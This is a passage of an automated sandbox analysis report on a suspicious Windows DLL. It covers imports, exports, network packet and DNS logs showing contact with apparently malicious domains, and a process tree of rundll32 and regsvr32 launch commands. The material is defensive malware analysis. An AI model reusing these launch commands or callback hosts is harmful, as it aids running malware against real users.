                                                                                                                  KERNEL32.dllUnmapViewOfFile, FreeLibrary, GetModuleFileNameW, GetModuleHandleW, GetProcAddress, LoadLibraryExW, LoadResource, SizeofResource, FindResourceW, lstrcmpiW, MultiByteToWideChar, MapViewOfFile, EncodePointer, EnterCriticalSection, LeaveCriticalSection, GetThreadLocale, SetThreadLocale, CreateFileW, GetFileSizeEx, CreateFileMappingW, GetCurrentThreadId, GetCurrentProcessId, DeleteCriticalSection, InitializeCriticalSectionEx, GetLastError, RaiseException, DecodePointer, CloseHandle, CreateEventW, OpenEventA, CreateEventA, WaitForSingleObjectEx, ResetEvent, SetEvent, WriteConsoleW, GetConsoleMode, GetConsoleCP, WriteFile, LocalAlloc, SetLastError, LocalFree, IsDebuggerPresent, OutputDebugStringW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, GetStartupInfoW, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, InterlockedFlushSList, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitProcess, GetModuleHandleExW, HeapFree, HeapAlloc, HeapSize, HeapReAlloc, GetStdHandle, GetFileType, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetProcessHeap, SetFilePointerEx, GetStringTypeW, SetStdHandle, FlushFileBuffers
                                                                                                                  USER32.dllCharNextW
                                                                                                                  ADVAPI32.dllRegQueryInfoKeyW, RegOpenKeyExW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegCloseKey, RegSetValueExW
                                                                                                                  ole32.dllCoTaskMemRealloc, CoTaskMemFree, CoCreateInstance, StringFromGUID2, CoTaskMemAlloc
                                                                                                                  OLEAUT32.dllVarUI4FromStr, SysFreeString, SysAllocString, SysStringLen, LoadTypeLib, RegisterTypeLib, UnRegisterTypeLib
                                                                                                                  ntdll.dllNtRequestWaitReplyPort, NtConnectPort, NtClose, NtRequestPort, RtlCaptureContext, RtlLookupFunctionEntry, NtCreateSection, RtlVirtualUnwind, RtlNtStatusToDosError, RtlInitUnicodeString

                                                                                                                  Exports

                                                                                                                  NameOrdinalAddress
                                                                                                                  DllCanUnloadNow10x18000b1c0
                                                                                                                  DllGetClassObject20x18000b060
                                                                                                                  DllInstall30x18000b350
                                                                                                                  stow40x18000b1f0
                                                                                                                  DllUnregisterServer50x18000b330

                                                                                                                  Possible Origin

                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                  EnglishUnited States

                                                                                                                  Network Behavior

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  May 11, 2024 00:04:12.876111984 CEST49745443192.168.2.491.194.11.183
                                                                                                                  May 11, 2024 00:04:12.876151085 CEST4434974591.194.11.183192.168.2.4
                                                                                                                  May 11, 2024 00:04:12.876234055 CEST49745443192.168.2.491.194.11.183
                                                                                                                  May 11, 2024 00:04:12.884301901 CEST49745443192.168.2.491.194.11.183
                                                                                                                  May 11, 2024 00:04:12.884325027 CEST4434974591.194.11.183192.168.2.4
                                                                                                                  May 11, 2024 00:04:13.100040913 CEST4434974591.194.11.183192.168.2.4
                                                                                                                  May 11, 2024 00:04:13.100138903 CEST49745443192.168.2.491.194.11.183
                                                                                                                  May 11, 2024 00:04:13.150934935 CEST49745443192.168.2.491.194.11.183
                                                                                                                  May 11, 2024 00:04:13.150954962 CEST4434974591.194.11.183192.168.2.4
                                                                                                                  May 11, 2024 00:04:13.151766062 CEST4434974591.194.11.183192.168.2.4
                                                                                                                  May 11, 2024 00:04:13.151813984 CEST49745443192.168.2.491.194.11.183
                                                                                                                  May 11, 2024 00:04:13.153366089 CEST49745443192.168.2.491.194.11.183
                                                                                                                  May 11, 2024 00:04:13.196130991 CEST4434974591.194.11.183192.168.2.4
                                                                                                                  May 11, 2024 00:04:13.836091995 CEST4434974591.194.11.183192.168.2.4
                                                                                                                  May 11, 2024 00:04:13.836138010 CEST49745443192.168.2.491.194.11.183
                                                                                                                  May 11, 2024 00:04:13.836318970 CEST4434974591.194.11.183192.168.2.4
                                                                                                                  May 11, 2024 00:04:13.836368084 CEST49745443192.168.2.491.194.11.183
                                                                                                                  May 11, 2024 00:04:13.836373091 CEST4434974591.194.11.183192.168.2.4
                                                                                                                  May 11, 2024 00:04:13.836404085 CEST49745443192.168.2.491.194.11.183
                                                                                                                  May 11, 2024 00:04:13.836424112 CEST4434974591.194.11.183192.168.2.4
                                                                                                                  May 11, 2024 00:04:13.836445093 CEST49745443192.168.2.491.194.11.183
                                                                                                                  May 11, 2024 00:04:13.836451054 CEST4434974591.194.11.183192.168.2.4
                                                                                                                  May 11, 2024 00:04:13.836477041 CEST49745443192.168.2.491.194.11.183
                                                                                                                  May 11, 2024 00:04:14.160665989 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:14.160695076 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:14.160757065 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:14.161567926 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:14.161585093 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:14.349921942 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:14.349992037 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:14.633188009 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:14.633209944 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:14.633583069 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:14.633660078 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:14.633950949 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:14.680125952 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.302793026 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.302824020 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.302925110 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.302937031 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.302953005 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.303011894 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.303020000 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.303076029 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.423475027 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.423537016 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.423574924 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.423590899 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.423614025 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.423616886 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.423635960 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.423640013 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.423652887 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.423682928 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.423687935 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.423732996 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.544538021 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.544625044 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.544735909 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.544791937 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.545012951 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.545084953 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.545223951 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.545291901 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.545304060 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.545350075 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.665793896 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.665921926 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.665981054 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.666047096 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.666162968 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.666223049 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.787254095 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.787345886 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.787383080 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.787396908 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.787437916 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.787437916 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.787859917 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.787950039 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.788012028 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.788074017 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.788597107 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.788633108 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.788666964 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.788672924 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.788682938 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.788746119 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.908390045 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.908490896 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.908793926 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.908823967 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.908847094 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.908876896 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.908876896 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.908888102 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.908951044 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:16.029175997 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:16.029218912 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:16.029264927 CEST49750443192.168.2.4138.124.183.215

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  May 11, 2024 00:04:12.655221939 CEST6103653192.168.2.41.1.1.1
                                                                                                                  May 11, 2024 00:04:12.871501923 CEST53610361.1.1.1192.168.2.4
                                                                                                                  May 11, 2024 00:04:13.858141899 CEST4981053192.168.2.41.1.1.1
                                                                                                                  May 11, 2024 00:04:14.159241915 CEST53498101.1.1.1192.168.2.4
                                                                                                                  May 11, 2024 00:04:18.686336040 CEST5941853192.168.2.41.1.1.1
                                                                                                                  May 11, 2024 00:04:18.799472094 CEST53594181.1.1.1192.168.2.4
                                                                                                                  May 11, 2024 00:04:19.608544111 CEST5506253192.168.2.41.1.1.1
                                                                                                                  May 11, 2024 00:04:19.711488962 CEST53550621.1.1.1192.168.2.4
                                                                                                                  May 11, 2024 00:04:35.505889893 CEST5248453192.168.2.41.1.1.1
                                                                                                                  May 11, 2024 00:04:35.619683981 CEST53524841.1.1.1192.168.2.4
                                                                                                                  May 11, 2024 00:05:43.047148943 CEST6322753192.168.2.41.1.1.1
                                                                                                                  May 11, 2024 00:05:43.138046026 CEST53632271.1.1.1192.168.2.4
                                                                                                                  May 11, 2024 00:06:00.977772951 CEST5786553192.168.2.41.1.1.1
                                                                                                                  May 11, 2024 00:06:01.079061031 CEST53578651.1.1.1192.168.2.4
                                                                                                                  May 11, 2024 00:06:08.749888897 CEST5367753192.168.2.41.1.1.1
                                                                                                                  May 11, 2024 00:06:08.864455938 CEST53536771.1.1.1192.168.2.4

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  May 11, 2024 00:04:12.655221939 CEST192.168.2.41.1.1.10x8441Standard query (0)boriz400.comA (IP address)IN (0x0001)false
                                                                                                                  May 11, 2024 00:04:13.858141899 CEST192.168.2.41.1.1.10x3148Standard query (0)altynbe.comA (IP address)IN (0x0001)false
                                                                                                                  May 11, 2024 00:04:18.686336040 CEST192.168.2.41.1.1.10xaee4Standard query (0)ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.ioA (IP address)IN (0x0001)false
                                                                                                                  May 11, 2024 00:04:19.608544111 CEST192.168.2.41.1.1.10x69b6Standard query (0)anikvan.comA (IP address)IN (0x0001)false
                                                                                                                  May 11, 2024 00:04:35.505889893 CEST192.168.2.41.1.1.10x5f9fStandard query (0)uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioA (IP address)IN (0x0001)false
                                                                                                                  May 11, 2024 00:05:43.047148943 CEST192.168.2.41.1.1.10xc6d8Standard query (0)workspacin.cloudA (IP address)IN (0x0001)false
                                                                                                                  May 11, 2024 00:06:00.977772951 CEST192.168.2.41.1.1.10xc19bStandard query (0)uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioA (IP address)IN (0x0001)false
                                                                                                                  May 11, 2024 00:06:08.749888897 CEST192.168.2.41.1.1.10x7f64Standard query (0)ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.ioA (IP address)IN (0x0001)false

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  May 11, 2024 00:04:12.871501923 CEST1.1.1.1192.168.2.40x8441No error (0)boriz400.com91.194.11.183A (IP address)IN (0x0001)false
                                                                                                                  May 11, 2024 00:04:14.159241915 CEST1.1.1.1192.168.2.40x3148No error (0)altynbe.com138.124.183.215A (IP address)IN (0x0001)false
                                                                                                                  May 11, 2024 00:04:18.799472094 CEST1.1.1.1192.168.2.40xaee4No error (0)ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.iopub-ingress-aws-use1.cloud-ara.tyk.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                  May 11, 2024 00:04:18.799472094 CEST1.1.1.1192.168.2.40xaee4No error (0)pub-ingress-aws-use1.cloud-ara.tyk.ioae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  May 11, 2024 00:04:18.799472094 CEST1.1.1.1192.168.2.40xaee4No error (0)ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com54.175.181.104A (IP address)IN (0x0001)false
                                                                                                                  May 11, 2024 00:04:18.799472094 CEST1.1.1.1192.168.2.40xaee4No error (0)ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com35.172.8.165A (IP address)IN (0x0001)false
                                                                                                                  May 11, 2024 00:04:18.799472094 CEST1.1.1.1192.168.2.40xaee4No error (0)ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com54.159.36.188A (IP address)IN (0x0001)false
                                                                                                                  May 11, 2024 00:04:19.711488962 CEST1.1.1.1192.168.2.40x69b6No error (0)anikvan.com95.164.68.73A (IP address)IN (0x0001)false
                                                                                                                  May 11, 2024 00:04:35.619683981 CEST1.1.1.1192.168.2.40x5f9fNo error (0)uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.iopub-ingress-aws-euc1.cloud-ara.tyk.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                  May 11, 2024 00:04:35.619683981 CEST1.1.1.1192.168.2.40x5f9fNo error (0)pub-ingress-aws-euc1.cloud-ara.tyk.ioae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  May 11, 2024 00:04:35.619683981 CEST1.1.1.1192.168.2.40x5f9fNo error (0)ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com3.69.236.35A (IP address)IN (0x0001)false
                                                                                                                  May 11, 2024 00:04:35.619683981 CEST1.1.1.1192.168.2.40x5f9fNo error (0)ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com3.72.42.242A (IP address)IN (0x0001)false
                                                                                                                  May 11, 2024 00:04:35.619683981 CEST1.1.1.1192.168.2.40x5f9fNo error (0)ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com35.157.36.116A (IP address)IN (0x0001)false
                                                                                                                  May 11, 2024 00:05:43.138046026 CEST1.1.1.1192.168.2.40xc6d8No error (0)workspacin.cloud104.21.16.155A (IP address)IN (0x0001)false
                                                                                                                  May 11, 2024 00:05:43.138046026 CEST1.1.1.1192.168.2.40xc6d8No error (0)workspacin.cloud172.67.213.171A (IP address)IN (0x0001)false
                                                                                                                  May 11, 2024 00:06:01.079061031 CEST1.1.1.1192.168.2.40xc19bNo error (0)uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.iopub-ingress-aws-euc1.cloud-ara.tyk.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                  May 11, 2024 00:06:01.079061031 CEST1.1.1.1192.168.2.40xc19bNo error (0)pub-ingress-aws-euc1.cloud-ara.tyk.ioae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  May 11, 2024 00:06:01.079061031 CEST1.1.1.1192.168.2.40xc19bNo error (0)ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com3.69.236.35A (IP address)IN (0x0001)false
                                                                                                                  May 11, 2024 00:06:01.079061031 CEST1.1.1.1192.168.2.40xc19bNo error (0)ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com35.157.36.116A (IP address)IN (0x0001)false
                                                                                                                  May 11, 2024 00:06:01.079061031 CEST1.1.1.1192.168.2.40xc19bNo error (0)ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com3.72.42.242A (IP address)IN (0x0001)false
                                                                                                                  May 11, 2024 00:06:08.864455938 CEST1.1.1.1192.168.2.40x7f64No error (0)ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.iopub-ingress-aws-use1.cloud-ara.tyk.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                  May 11, 2024 00:06:08.864455938 CEST1.1.1.1192.168.2.40x7f64No error (0)pub-ingress-aws-use1.cloud-ara.tyk.ioae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  May 11, 2024 00:06:08.864455938 CEST1.1.1.1192.168.2.40x7f64No error (0)ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com54.175.181.104A (IP address)IN (0x0001)false
                                                                                                                  May 11, 2024 00:06:08.864455938 CEST1.1.1.1192.168.2.40x7f64No error (0)ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com54.159.36.188A (IP address)IN (0x0001)false
                                                                                                                  May 11, 2024 00:06:08.864455938 CEST1.1.1.1192.168.2.40x7f64No error (0)ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com35.172.8.165A (IP address)IN (0x0001)false

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • boriz400.com
                                                                                                                  • altynbe.com
                                                                                                                  • ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io
                                                                                                                  • anikvan.com
                                                                                                                  • uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
                                                                                                                  • workspacin.cloud

                                                                                                                  Statistics

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Target ID:0
                                                                                                                  Start time:00:03:58
                                                                                                                  Start date:11/05/2024
                                                                                                                  Path:C:\Windows\System32\loaddll64.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:loaddll64.exe "C:\Users\user\Desktop\upfilles.dll.dll"
                                                                                                                  Imagebase:0x7ff61d400000
                                                                                                                  File size:165'888 bytes
                                                                                                                  MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:1
                                                                                                                  Start time:00:03:59
                                                                                                                  Start date:11/05/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:2
                                                                                                                  Start time:00:03:59
                                                                                                                  Start date:11/05/2024
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
                                                                                                                  Imagebase:0x7ff70e6c0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:3
                                                                                                                  Start time:00:03:59
                                                                                                                  Start date:11/05/2024
                                                                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:regsvr32.exe /i /s C:\Users\user\Desktop\upfilles.dll.dll
                                                                                                                  Imagebase:0x7ff64ee30000
                                                                                                                  File size:25'088 bytes
                                                                                                                  MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:4
                                                                                                                  Start time:00:03:59
                                                                                                                  Start date:11/05/2024
                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
                                                                                                                  Imagebase:0x7ff74e4b0000
                                                                                                                  File size:71'680 bytes
                                                                                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:5
                                                                                                                  Start time:00:03:59
                                                                                                                  Start date:11/05/2024
                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllCanUnloadNow
                                                                                                                  Imagebase:0x7ff74e4b0000
                                                                                                                  File size:71'680 bytes
                                                                                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:6
                                                                                                                  Start time:00:04:02
                                                                                                                  Start date:11/05/2024
                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllGetClassObject
                                                                                                                  Imagebase:0x7ff74e4b0000
                                                                                                                  File size:71'680 bytes
                                                                                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:9
                                                                                                                  Start time:00:04:02
                                                                                                                  Start date:11/05/2024
                                                                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 6324 -s 344
                                                                                                                  Imagebase:0x7ff67a3b0000
                                                                                                                  File size:570'736 bytes
                                                                                                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:10
                                                                                                                  Start time:00:04:05
                                                                                                                  Start date:11/05/2024
                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllInstall
                                                                                                                  Imagebase:0x7ff74e4b0000
                                                                                                                  File size:71'680 bytes
                                                                                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:12
                                                                                                                  Start time:00:04:05
                                                                                                                  Start date:11/05/2024
                                                                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 6516 -s 344
                                                                                                                  Imagebase:0x7ff67a3b0000
                                                                                                                  File size:570'736 bytes
                                                                                                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:13
                                                                                                                  Start time:00:04:08
                                                                                                                  Start date:11/05/2024
                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllCanUnloadNow
                                                                                                                  Imagebase:0x7ff74e4b0000
                                                                                                                  File size:71'680 bytes
                                                                                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:14
                                                                                                                  Start time:00:04:08
                                                                                                                  Start date:11/05/2024
                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllGetClassObject
                                                                                                                  Imagebase:0x7ff74e4b0000
                                                                                                                  File size:71'680 bytes
                                                                                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

